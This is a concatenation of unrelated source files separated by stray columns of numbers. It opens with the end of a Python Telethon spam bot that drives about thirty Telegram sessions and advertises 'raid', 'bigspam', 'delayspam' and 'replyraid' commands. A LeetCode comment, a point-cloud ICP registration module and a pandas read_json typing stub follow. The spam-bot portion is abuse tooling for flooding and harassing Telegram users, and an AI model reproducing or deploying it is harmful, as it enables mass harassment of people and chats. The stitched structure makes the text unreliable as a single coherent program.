dav.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> 
await raj.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await put.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await eag.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await gle.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await wal.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await aaa.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await boy.disconnect()<br/> except Exception as e:<br/> pass<br/> os.execl(sys.executable, sys.executable, *sys.argv)<br/> quit()<div></div> <br/> <br/> <br/> <br/> <br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@shi.on(events.NewMessage(incoming=True, 
pattern=r"\*help"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*help"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*help"))<div></div>async def help(e):<br/> if e.sender_id in SMEX_USERS:<br/> text = "⛓𝗔𝘃𝗮𝗶𝗹𝗮𝗯𝗹𝗲 𝗖𝗼𝗺𝗺𝗮𝗻𝗱𝘀⛓\n\n⚜𝙐𝙩𝙞𝙡𝙨 𝘾𝙤𝙢𝙢𝙖𝙣𝙙⚜:\n*ping\n*restart\n\n🔰𝙐𝙨𝙚𝙧𝙗𝙤𝙩 𝘾𝙤𝙢𝙢𝙖𝙣𝙙🔰:\n*join\n*pjoin\n*leave\n\n🛡𝙎𝙥𝙖𝙢 𝘾𝙤𝙢𝙢𝙖𝙣𝙙🛡:\n*delayspam\n*bigspam\n*raid\n*replyraid\n*dreplyraid\n\n\nIf You Dont Understand How To Use This Bot Then Dont Use Your Noob Mind Just Contact @YashOP_XD"<br/> await e.reply(text, parse_mode=None, link_preview=None )<div></div> <div></div> <br/> <br/>text = """<div></div>💥💥 𝘼𝙍𝙆𝙃𝘼𝙈𝙭𝙂𝙊𝘿 𝙎𝙋𝘼𝙈 𝘽𝙊𝙏 💥💥💥<br/>💥 𝐁𝐎𝐓 𝐁𝐘 𝐘𝐀𝐒𝐇 𝐀𝐍𝐃 𝐋𝐔𝐂𝐈𝐅𝐄𝐑 💥"""<div></div>print(text)<br/>print("")<br/>print("𝗔𝗥𝗞𝗛𝗔𝗠𝘅𝗚𝗢𝗗 𝗦𝗣𝗔𝗠 𝗕𝗢𝗧 𝗥𝗘𝗔𝗗𝗬 𝗙𝗢𝗥 𝗨𝗦𝗘 𝗖𝗛𝗘𝗖𝗞 𝗕𝗬 𝗗𝗢𝗜𝗡𝗚 *ping")<br/>if len(sys.argv) not in (1, 3, 4):<br/> try:<br/> idk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> ydk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> wdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> hdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> sdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> adk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> bdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> cdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> edk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> ddk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> 
vkk.disconnect()<br/> except Exception as e:<br/> pass <br/> try:<br/> kkk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> lkk.disconnect()<br/> except Exception as e:<br/> pass <br/> try:<br/> mkk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> sid.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> shy.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> aan.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> ake.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> eel.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> khu.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> shi.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> yaa.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> dav.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> raj.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> put.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> eag.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> gle.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> wal.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> aaa.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> boy.disconnect()<br/> except Exception as e:<br/> pass<br/>else:<br/> try:<br/> idk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> ydk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> wdk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> hdk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> sdk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> adk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> bdk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> 
cdk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> edk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> ddk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> vkk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> kkk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> lkk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> mkk.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> sid.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> shy.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> aan.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> ake.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> eel.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> khu.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> shi.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> yaa.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> dav.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> raj.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> put.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> eag.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> gle.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> wal.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> aaa.run_until_disconnected()<br/> except Exception as e:<br/> pass<br/> try:<br/> boy.run_until_disconnected()<br/> except Exception as e:<br/> pass<div></div></div>
| 94,575
| 94,575
| 0.614835
| 12,675
| 94,575
| 4.536805
| 0.03574
| 0.058431
| 0.131469
| 0.1899
| 0.886512
| 0.871018
| 0.866514
| 0.813109
| 0.809944
| 0.452682
| 0
| 0.004831
| 0.19244
| 94,575
| 1
| 94,575
| 94,575
| 0.747771
| 0
| 0
| 0
| 0
| 12
| 0.098281
| 0.005731
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 1
| 1
| null | null | 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 1
|
0
| 14
|
98196d2ec072930b4a547640c3df78bc65f90ec2
| 87
|
py
|
Python
|
AlgorithmProblems/0152. Maximum Product Subarray/main0152.py
|
lynnli92/leetcode-group-solution
|
b497eaf29fb820648366b44e27c918503936b167
|
[
"MIT"
] | 4
|
2021-12-31T00:53:32.000Z
|
2022-01-22T21:28:46.000Z
|
AlgorithmProblems/0152. Maximum Product Subarray/main0152.py
|
lynnli92/leetcode-group-solution
|
b497eaf29fb820648366b44e27c918503936b167
|
[
"MIT"
] | 1
|
2021-12-31T00:40:34.000Z
|
2021-12-31T00:40:34.000Z
|
AlgorithmProblems/0152. Maximum Product Subarray/main0152.py
|
lynnli92/leetcode-group-solution
|
b497eaf29fb820648366b44e27c918503936b167
|
[
"MIT"
] | 5
|
2021-12-31T00:28:40.000Z
|
2022-03-22T21:01:40.000Z
|
'''
nums: [2, 3, -2, 4]
max: [2, 6, -2, 4]
min: [2, 3, -12, -48]
max: [2, 6, 6, 6]
'''
| 14.5
| 21
| 0.356322
| 20
| 87
| 1.55
| 0.45
| 0.129032
| 0.322581
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.276923
| 0.252874
| 87
| 6
| 22
| 14.5
| 0.2
| 0.908046
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 1
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e251854943bc7f122a17c9dea4b676372614f592
| 20,790
|
py
|
Python
|
autolab_core/point_registration.py
|
shivamvats/autolab_core
|
cda081d2e07e3fe6cc9f3e8c86eea92330910d20
|
[
"Apache-2.0"
] | 68
|
2017-07-02T22:14:47.000Z
|
2022-03-30T19:09:37.000Z
|
autolab_core/point_registration.py
|
shivamvats/autolab_core
|
cda081d2e07e3fe6cc9f3e8c86eea92330910d20
|
[
"Apache-2.0"
] | 14
|
2017-06-29T18:27:12.000Z
|
2022-02-02T20:59:02.000Z
|
autolab_core/point_registration.py
|
shivamvats/autolab_core
|
cda081d2e07e3fe6cc9f3e8c86eea92330910d20
|
[
"Apache-2.0"
] | 35
|
2017-07-17T01:44:59.000Z
|
2022-03-30T19:09:28.000Z
|
"""
Classes for point set registration using variants of Iterated-Closest Point
Author: Jeff Mahler
"""
from abc import ABCMeta, abstractmethod
import logging
import numpy as np
from .feature_matcher import PointToPlaneFeatureMatcher
from .points import PointCloud, NormalCloud
from .rigid_transformations import RigidTransform
from .utils import skew
class RegistrationResult(object):
"""Struct to hold results of point set registration.
Attributes
----------
T_source_target : :obj:`autolab_core.RigidTranform`
transformation from source to target frame
cost : float
numeric value of the registration objective for the given transform
"""
def __init__(self, T_source_target, cost):
self.T_source_target = T_source_target
self.cost = cost
class IterativeRegistrationSolver:
"""Abstract class for iterative registration solvers."""
__metaclass__ = ABCMeta
@abstractmethod
def register(
self,
source_point_cloud,
target_point_cloud,
source_normal_cloud,
target_normal_cloud,
matcher,
num_iterations=1,
compute_total_cost=True,
match_centroids=False,
vis=False,
):
"""Iteratively register objects to one another.
Parameters
----------
source_point_cloud : :obj:`autolab_core.PointCloud`
source object points
target_point_cloud : :obj`autolab_core.PointCloud`
target object points
source_normal_cloud : :obj:`autolab_core.NormalCloud`
source object outward-pointing normals
target_normal_cloud : :obj:`autolab_core.NormalCloud`
target object outward-pointing normals
matcher : :obj:`PointToPlaneFeatureMatcher`
object to match the point sets
num_iterations : int
the number of iterations to run
compute_total_cost : bool
whether or not to compute the total cost upon termination.
match_centroids : bool
whether or not to match the centroids of the point clouds
Returns
-------
:obj`RegistrationResult`
results containing source to target transformation and cost
"""
pass
class PointToPlaneICPSolver(IterativeRegistrationSolver):
    """Performs Iterated Closest Point with an objective weighted between
    point-to-point and point-to-plane.

    Attributes
    ----------
    sample_size : int
        number of randomly sampled points to use per iteration
    cost_sample_size : int
        number of randomly sampled points to use for cost evaluations
    gamma : float
        weight of point-to-point objective relative to point-to-plane objective
    mu : float
        regularizer for matrix inversion in the Gauss-Newton step
    """

    def __init__(
        self, sample_size=100, cost_sample_size=100, gamma=100.0, mu=1e-2
    ):
        self.sample_size_ = sample_size
        self.cost_sample_size_ = cost_sample_size
        self.gamma_ = gamma
        self.mu_ = mu
        IterativeRegistrationSolver.__init__(self)

    @staticmethod
    def _check_inputs(
        source_point_cloud,
        target_point_cloud,
        source_normal_cloud,
        target_normal_cloud,
        matcher,
    ):
        """Validate argument types and point/normal count agreement.

        Raises
        ------
        ValueError
            If any argument has the wrong type or a point cloud disagrees
            in size with its corresponding normal cloud.
        """
        if not isinstance(source_point_cloud, PointCloud) or not isinstance(
            target_point_cloud, PointCloud
        ):
            raise ValueError(
                "Source and target point clouds must be PointCloud objects"
            )
        if not isinstance(source_normal_cloud, NormalCloud) or not isinstance(
            target_normal_cloud, NormalCloud
        ):
            raise ValueError(
                "Source and target normal clouds must be NormalCloud objects"
            )
        if not isinstance(matcher, PointToPlaneFeatureMatcher):
            raise ValueError(
                "Feature matcher must be a PointToPlaneFeatureMatcher object"
            )
        if (
            source_point_cloud.num_points != source_normal_cloud.num_points
            or target_point_cloud.num_points != target_normal_cloud.num_points
        ):
            # note: the original message embedded a long run of spaces from a
            # backslash line continuation inside the string literal
            raise ValueError(
                "Input point clouds must have the same number of points "
                "as corresponding normal cloud"
            )

    @staticmethod
    def _prune_zero_normals(points, normals):
        """Drop rows whose normal has zero magnitude.

        Zero-length normals carry no orientation information and would make
        the point-to-plane term degenerate.
        """
        valid_inds = np.nonzero(np.linalg.norm(normals, axis=1))[0]
        return points[valid_inds, :], normals[valid_inds, :]

    @staticmethod
    def _subsample(points, normals, size):
        """Randomly sample (with replacement) matching point/normal rows."""
        inds = np.random.choice(points.shape[0], size=size)
        return points[inds, :], normals[inds, :]

    @staticmethod
    def _transform(points, normals, R, t):
        """Apply rotation R and translation t to row-major points/normals."""
        points_tf = (R.dot(points.T) + np.tile(t, [1, points.shape[0]])).T
        normals_tf = (R.dot(normals.T)).T
        return points_tf, normals_tf

    @staticmethod
    def _valid_correspondences(corrs):
        """Extract matched rows from a correspondence object.

        Returns
        -------
        tuple
            (source points, target points, target normals, num matches),
            keeping only entries whose ``index_map`` entry is not -1.
        """
        valid = np.where(corrs.index_map != -1)[0]
        return (
            corrs.source_points[valid, :],
            corrs.target_points[corrs.index_map[valid], :],
            corrs.target_normals[corrs.index_map[valid], :],
            valid.shape[0],
        )

    def _corr_cost(
        self, source_corr_points, target_corr_points, target_corr_normals
    ):
        """Mean point-to-plane cost plus gamma times mean point-to-point cost."""
        num_corrs = source_corr_points.shape[0]
        diffs = source_corr_points - target_corr_points
        # row-wise dot products; numerically equivalent to
        # np.diag(diffs.dot(target_corr_normals.T)) but O(N) instead of
        # materializing an O(N^2) intermediate matrix
        alignment = np.sum(diffs * target_corr_normals, axis=1)
        point_plane_cost = (1.0 / num_corrs) * np.sum(alignment * alignment)
        point_dist_cost = (1.0 / num_corrs) * np.sum(
            np.linalg.norm(diffs, axis=1) ** 2
        )
        return point_plane_cost + self.gamma_ * point_dist_cost

    def register(
        self,
        source_point_cloud,
        target_point_cloud,
        source_normal_cloud,
        target_normal_cloud,
        matcher,
        num_iterations=1,
        compute_total_cost=True,
        match_centroids=False,
        vis=False,
    ):
        """
        Iteratively register objects to one another using a modified version
        of point to plane ICP. The cost func is PointToPlane_COST +
        gamma * PointToPoint_COST. Uses a `stochastic Gauss-Newton step`
        where on each iteration a smaller number of points is sampled.

        Parameters
        ----------
        source_point_cloud : :obj:`autolab_core.PointCloud`
            source object points
        target_point_cloud : :obj:`autolab_core.PointCloud`
            target object points
        source_normal_cloud : :obj:`autolab_core.NormalCloud`
            source object outward-pointing normals
        target_normal_cloud : :obj:`autolab_core.NormalCloud`
            target object outward-pointing normals
        matcher : :obj:`PointToPlaneFeatureMatcher`
            object to match the point sets
        num_iterations : int
            the number of iterations to run
        compute_total_cost : bool
            whether or not to compute the total cost upon termination.
        match_centroids : bool
            whether or not to match the centroids of the point clouds
        vis : bool
            whether or not to visualize intermediate results

        Returns
        -------
        :obj:`RegistrationResult`
            results containing source to target transformation and cost
        """
        self._check_inputs(
            source_point_cloud,
            target_point_cloud,
            source_normal_cloud,
            target_normal_cloud,
            matcher,
        )
        # extract source and target point and normal data arrays (row-major)
        orig_source_points = source_point_cloud.data.T
        orig_target_points = target_point_cloud.data.T
        orig_source_normals = source_normal_cloud.data.T
        orig_target_normals = target_normal_cloud.data.T
        # discard points with degenerate normals
        orig_target_points, orig_target_normals = self._prune_zero_normals(
            orig_target_points, orig_target_normals
        )
        orig_source_points, orig_source_normals = self._prune_zero_normals(
            orig_source_points, orig_source_normals
        )
        # initial transform estimate
        R_sol = np.eye(3)
        t_sol = np.zeros([3, 1])
        if match_centroids:
            # init translation with the difference between the centroids
            t_sol[:, 0] = np.mean(orig_target_points, axis=0) - np.mean(
                orig_source_points, axis=0
            )
        # iterate through
        for i in range(num_iterations):
            logging.info("Point to plane ICP iteration %d", i)
            # subsample points for the stochastic Gauss-Newton step
            source_points, source_normals = self._subsample(
                orig_source_points, orig_source_normals, self.sample_size_
            )
            target_points, target_normals = self._subsample(
                orig_target_points, orig_target_normals, self.sample_size_
            )
            # transform source points by the current estimate
            source_points, source_normals = self._transform(
                source_points, source_normals, R_sol, t_sol
            )
            # closest points
            corrs = matcher.match(
                source_points, target_points, source_normals, target_normals
            )
            (
                source_corr_points,
                target_corr_points,
                target_corr_normals,
                num_corrs,
            ) = self._valid_correspondences(corrs)
            if num_corrs == 0:
                logging.warning("No correspondences found")
                break
            # create A and b matrices for Gauss-Newton step on joint cost
            # function
            A = np.zeros([6, 6])
            b = np.zeros([6, 1])
            Ap = np.zeros([6, 6])
            bp = np.zeros([6, 1])
            G = np.zeros([3, 6])
            G[:, 3:] = np.eye(3)
            # NOTE: the original used `i` here, shadowing the outer
            # iteration index; renamed to `j` for clarity
            for j in range(num_corrs):
                s = source_corr_points[j : j + 1, :].T
                t = target_corr_points[j : j + 1, :].T
                n = target_corr_normals[j : j + 1, :].T
                G[:, :3] = skew(s).T
                A += G.T.dot(n).dot(n.T).dot(G)
                b += G.T.dot(n).dot(n.T).dot(t - s)
                Ap += G.T.dot(G)
                bp += G.T.dot(t - s)
            v = np.linalg.solve(
                A + self.gamma_ * Ap + self.mu_ * np.eye(6),
                b + self.gamma_ * bp,
            )
            # create pose values from the solution; project the linearized
            # rotation back onto SO(3) via SVD
            R = np.eye(3) + skew(v[:3])
            # np.float was removed from NumPy; use np.float64 explicitly
            U, S, V = np.linalg.svd(R.astype(np.float64))
            R = U.dot(V)
            t = v[3:]
            # incrementally update the final transform
            R_sol = R.dot(R_sol)
            t_sol = R.dot(t_sol) + t
        T_source_target = RigidTransform(
            R_sol,
            t_sol,
            from_frame=source_point_cloud.frame,
            to_frame=target_point_cloud.frame,
        )
        total_cost = 0
        if compute_total_cost:
            # rematch all points under the final transform to get the cost
            source_points, source_normals = self._transform(
                orig_source_points, orig_source_normals, R_sol, t_sol
            )
            corrs = matcher.match(
                source_points,
                orig_target_points,
                source_normals,
                orig_target_normals,
            )
            (
                source_corr_points,
                target_corr_points,
                target_corr_normals,
                num_corrs,
            ) = self._valid_correspondences(corrs)
            if num_corrs == 0:
                return RegistrationResult(T_source_target, np.inf)
            total_cost = self._corr_cost(
                source_corr_points, target_corr_points, target_corr_normals
            )
        return RegistrationResult(T_source_target, total_cost)

    def register_2d(
        self,
        source_point_cloud,
        target_point_cloud,
        source_normal_cloud,
        target_normal_cloud,
        matcher,
        num_iterations=1,
        compute_total_cost=True,
        vis=False,
    ):
        """
        Iteratively register objects to one another using a modified version
        of point to plane ICP which only solves for tx and ty (translation
        in the plane) and theta (rotation about the z axis). The cost func
        is actually PointToPlane_COST + gamma * PointToPoint_COST
        Points should be specified in the basis of the planar worksurface.

        Parameters
        ----------
        source_point_cloud : :obj:`autolab_core.PointCloud`
            source object points
        target_point_cloud : :obj:`autolab_core.PointCloud`
            target object points
        source_normal_cloud : :obj:`autolab_core.NormalCloud`
            source object outward-pointing normals
        target_normal_cloud : :obj:`autolab_core.NormalCloud`
            target object outward-pointing normals
        matcher : :obj:`PointToPlaneFeatureMatcher`
            object to match the point sets
        num_iterations : int
            the number of iterations to run
        compute_total_cost : bool
            whether or not to compute the total cost upon termination.
        vis : bool
            whether or not to visualize intermediate results

        Returns
        -------
        :obj:`RegistrationResult`
            results containing source to target transformation and cost
        """
        self._check_inputs(
            source_point_cloud,
            target_point_cloud,
            source_normal_cloud,
            target_normal_cloud,
            matcher,
        )
        # extract source and target point and normal data arrays (row-major)
        orig_source_points = source_point_cloud.data.T
        orig_target_points = target_point_cloud.data.T
        orig_source_normals = source_normal_cloud.data.T
        orig_target_normals = target_normal_cloud.data.T
        # setup the problem
        logging.info("Setting up problem")
        orig_target_points, orig_target_normals = self._prune_zero_normals(
            orig_target_points, orig_target_normals
        )
        orig_source_points, orig_source_normals = self._prune_zero_normals(
            orig_source_points, orig_source_normals
        )
        # alloc buffers for solutions
        R_sol = np.eye(3)
        t_sol = np.zeros([3, 1])
        # iterate through
        for i in range(num_iterations):
            logging.info("Point to plane ICP iteration %d", i)
            # subsample points
            source_points, source_normals = self._subsample(
                orig_source_points, orig_source_normals, self.sample_size_
            )
            target_points, target_normals = self._subsample(
                orig_target_points, orig_target_normals, self.sample_size_
            )
            # transform source points
            source_points, source_normals = self._transform(
                source_points, source_normals, R_sol, t_sol
            )
            # closest points
            corrs = matcher.match(
                source_points, target_points, source_normals, target_normals
            )
            (
                source_corr_points,
                target_corr_points,
                target_corr_normals,
                num_corrs,
            ) = self._valid_correspondences(corrs)
            if num_corrs == 0:
                # consistent with register(): surface the early exit
                logging.warning("No correspondences found")
                break
            # create A and b matrices for Gauss-Newton step on joint cost
            # function
            A = np.zeros([3, 3])  # A and b for point to plane cost
            b = np.zeros([3, 1])
            Ap = np.zeros([3, 3])  # A and b for point to point cost
            bp = np.zeros([3, 1])
            G = np.zeros([3, 3])
            G[:2, 1:] = np.eye(2)
            for j in range(num_corrs):
                s = source_corr_points[j : j + 1, :].T
                t = target_corr_points[j : j + 1, :].T
                n = target_corr_normals[j : j + 1, :].T
                G[0, 0] = -s[1]
                G[1, 0] = s[0]
                A += G.T.dot(n).dot(n.T).dot(G)
                b += G.T.dot(n).dot(n.T).dot(t - s)
                Ap += G.T.dot(G)
                bp += G.T.dot(t - s)
            v = np.linalg.solve(
                A + self.gamma_ * Ap + self.mu_ * np.eye(3),
                b + self.gamma_ * bp,
            )
            # create pose values from the solution; project back onto SO(3)
            R = np.eye(3) + skew(np.array([[0], [0], [v[0, 0]]]))
            # np.float was removed from NumPy; use np.float64 explicitly
            U, S, V = np.linalg.svd(R.astype(np.float64))
            R = U.dot(V)
            t = np.array([[v[1, 0]], [v[2, 0]], [0]])
            # incrementally update the final transform
            R_sol = R.dot(R_sol)
            t_sol = R.dot(t_sol) + t
        # compute solution transform
        T_source_target = RigidTransform(
            R_sol,
            t_sol,
            from_frame=source_point_cloud.frame,
            to_frame=target_point_cloud.frame,
        )
        total_cost = 0
        if compute_total_cost:
            # subsample points for the cost evaluation
            source_points, source_normals = self._subsample(
                orig_source_points, orig_source_normals, self.cost_sample_size_
            )
            target_points, target_normals = self._subsample(
                orig_target_points, orig_target_normals, self.cost_sample_size_
            )
            # transform source points
            source_points, source_normals = self._transform(
                source_points, source_normals, R_sol, t_sol
            )
            # rematch to get the total cost
            corrs = matcher.match(
                source_points, target_points, source_normals, target_normals
            )
            (
                source_corr_points,
                target_corr_points,
                target_corr_normals,
                num_corrs,
            ) = self._valid_correspondences(corrs)
            if num_corrs == 0:
                return RegistrationResult(T_source_target, np.inf)
            total_cost = self._corr_cost(
                source_corr_points, target_corr_points, target_corr_normals
            )
        return RegistrationResult(T_source_target, total_cost)
| 37.459459
| 79
| 0.587686
| 2,430
| 20,790
| 4.769136
| 0.104938
| 0.040383
| 0.020709
| 0.019674
| 0.837777
| 0.820347
| 0.817154
| 0.817154
| 0.814393
| 0.814393
| 0
| 0.009672
| 0.333622
| 20,790
| 554
| 80
| 37.527076
| 0.826837
| 0.232179
| 0
| 0.709402
| 0
| 0
| 0.029872
| 0.003422
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014245
| false
| 0.002849
| 0.019943
| 0
| 0.05698
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2c3f27f7ea50e689308cc6b5b64d822c4d64ef65
| 1,824
|
py
|
Python
|
data/typing/pandas.io.json._json.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
data/typing/pandas.io.json._json.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
data/typing/pandas.io.json._json.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
import _io

from typing import *
# Auto-generated typing overloads for pandas' read_json, recording the
# concrete call signatures observed in downstream usage (dask); each
# docstring counts the observed calls.
# NOTE(review): `_io` is referenced in annotations below but not imported
# at the top of this file — confirm/add `import _io` or imports will fail.
@overload
def read_json(path_or_buf: str, orient: Literal["split"], lines: bool):
    """
    usage.dask: 1
    """
    ...
@overload
def read_json(path_or_buf: str, orient: Literal["records"], lines: bool):
    """
    usage.dask: 2
    """
    ...
@overload
def read_json(path_or_buf: str, orient: Literal["index"], lines: bool):
    """
    usage.dask: 1
    """
    ...
@overload
def read_json(path_or_buf: str, orient: Literal["columns"], lines: bool):
    """
    usage.dask: 1
    """
    ...
@overload
def read_json(path_or_buf: str, orient: Literal["values"], lines: bool):
    """
    usage.dask: 1
    """
    ...
@overload
def read_json(path_or_buf: _io.TextIOWrapper):
    """
    usage.dask: 1
    """
    ...
@overload
def read_json(path_or_buf: _io.TextIOWrapper, orient: Literal["split"], lines: bool):
    """
    usage.dask: 1
    """
    ...
@overload
def read_json(path_or_buf: _io.TextIOWrapper, orient: Literal["records"], lines: bool):
    """
    usage.dask: 1
    """
    ...
@overload
def read_json(path_or_buf: _io.StringIO, orient: Literal["records"], lines: bool):
    """
    usage.dask: 1
    """
    ...
@overload
def read_json(path_or_buf: _io.TextIOWrapper, orient: Literal["index"], lines: bool):
    """
    usage.dask: 1
    """
    ...
@overload
def read_json(path_or_buf: _io.TextIOWrapper, orient: Literal["columns"], lines: bool):
    """
    usage.dask: 1
    """
    ...
@overload
def read_json(path_or_buf: _io.TextIOWrapper, orient: Literal["values"], lines: bool):
    """
    usage.dask: 1
    """
    ...
# Catch-all implementation signature covering every observed combination.
def read_json(
    path_or_buf: Union[_io.TextIOWrapper, _io.StringIO, str],
    orient: Literal["values", "columns", "index", "records", "split"] = ...,
    lines: bool = ...,
):
    """
    usage.dask: 13
    """
    ...
| 16.733945
| 87
| 0.58114
| 221
| 1,824
| 4.579186
| 0.131222
| 0.089921
| 0.141304
| 0.192688
| 0.903162
| 0.880435
| 0.860672
| 0.835968
| 0.805336
| 0.805336
| 0
| 0.010014
| 0.233553
| 1,824
| 108
| 88
| 16.888889
| 0.713877
| 0.099781
| 0
| 0.581395
| 0
| 0
| 0.067082
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.302326
| false
| 0
| 0.023256
| 0
| 0.325581
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
